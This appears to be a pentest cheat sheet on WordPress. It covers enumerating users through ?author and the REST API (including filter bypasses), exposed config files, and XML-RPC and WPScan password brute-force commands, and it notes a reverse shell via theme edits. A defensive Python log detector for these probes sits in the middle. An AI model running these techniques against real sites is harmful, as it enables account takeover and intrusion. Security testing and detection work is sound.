WordPress

General & Tricks

# Usernames can be guessed on WordPress: the login form returns a different error message depending on whether the username exists.

# Interesting files
https://monsite.com/robots.txt
https://monsite.com/feed
https://monsite.com/readme.html
https://monsite.com/xmlrpc.php

# Configuration files
https://monsite.com/.htaccess
https://monsite.com/wp-config.php

# Directory listing
https://monsite.com/wp-includes

# XML-RPC attack (https://github.com/1N3/Wordpress-XMLRPC-Brute-Force-Exploit)
# You can brute-force user passwords through xmlrpc.php
./wp-xml-brute http://target.com/xmlrpc.php passwords.txt username1

# If you can upload files by any means, check /upload or /uploads for them

# Get WPEngine's config file
/_wpeprivate/config.json

Scanning and enumeration

# Enumerate users
Users can be found using ?author=XXX

# You can also use the REST API
/wp-json/wp/v2/users, then iterate over user IDs: /wp-json/wp/v2/users/1, /wp-json/wp/v2/users/2, ...

# If /?author=1 returns 403 Forbidden, you can bypass it
# (e.g. when the .htaccess blocks "?author")
# Bypass 1: http://xxx.fr/?x&author=1 --> redirects to http://xxx.fr/author/chris/?x
# Bypass 2: http://lictor.fr/index.php?author=1

# Another way
/wp-json/?rest_route=/wp/v2/users

# WPScan is a great automated tool (a Docker image is available)
docker pull wpscanteam/wpscan
docker run -it --rm wpscanteam/wpscan -u https://yourblog.com [options]

# Non-intrusive scan
wpscan.rb --url www.example.com

# Brute-force the passwords of the users found, using 50 threads
wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50

# Brute-force a single user
wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin

# Plugins enumeration
wpscan.rb --url www.example.com --enumerate p

# Users enumeration
wpscan.rb --url www.example.com --enumerate u
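Detection-side counterpart to the enumeration and XML-RPC techniques above, as an added example that is not part of the original notes: it parses combined-format access log lines (the sample below is constructed, not real traffic) and flags, per client IP, author-ID sweeps, REST user listing in both URL forms, and bursts of POSTs to xmlrpc.php. The per-category thresholds are assumed values to tune per site.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Combined log format: client IP, request method + path, status code
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample access log for this example (not real traffic)
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /?author=1 HTTP/1.1" 301 0
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /?author=2 HTTP/1.1" 301 0
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /?x&author=3 HTTP/1.1" 301 0
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 812
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /wp-json/?rest_route=/wp/v2/users HTTP/1.1" 200 812
198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403
198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403
198.51.100.9 - - [10/Oct/2023:13:56:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403
192.0.2.77 - - [10/Oct/2023:13:57:10 +0000] "GET /2023/10/hello-world/ HTTP/1.1" 200 5120
"""

def classify(method, path):
    """Map one request to a detection category, or None if it looks benign."""
    parsed = urlparse(path)
    query = parse_qs(parsed.query, keep_blank_values=True)
    if "author" in query:                       # /?author=N and /?x&author=N sweeps
        return "author_id_enum"
    if parsed.path.startswith("/wp-json/wp/v2/users") or \
       "/wp/v2/users" in "".join(query.get("rest_route", [])):
        return "rest_user_enum"                  # REST API user listing, both URL forms
    if method == "POST" and parsed.path == "/xmlrpc.php":
        return "xmlrpc_post"                     # candidate XML-RPC password guessing
    return None

def detect(log_text, thresholds=None):
    """Return {ip: {category: count}} for IPs at or above the per-category thresholds."""
    # Assumed thresholds; tune to the site's normal traffic
    thresholds = thresholds or {"author_id_enum": 3, "rest_user_enum": 1, "xmlrpc_post": 3}
    counts = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, _status = m.groups()
        cat = classify(method, path)
        if cat:
            counts[ip][cat] += 1
    return {ip: {c: n for c, n in cats.items() if n >= thresholds[c]}
            for ip, cats in counts.items()
            if any(n >= thresholds[c] for c, n in cats.items())}
```

Run `detect(SAMPLE_LOG)` to see the two flagged IPs; feeding it a real log (in the same format) works the same way.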

Reverse Shell

# You can obtain a reverse shell by editing theme template files (404.php, footer.php, ...)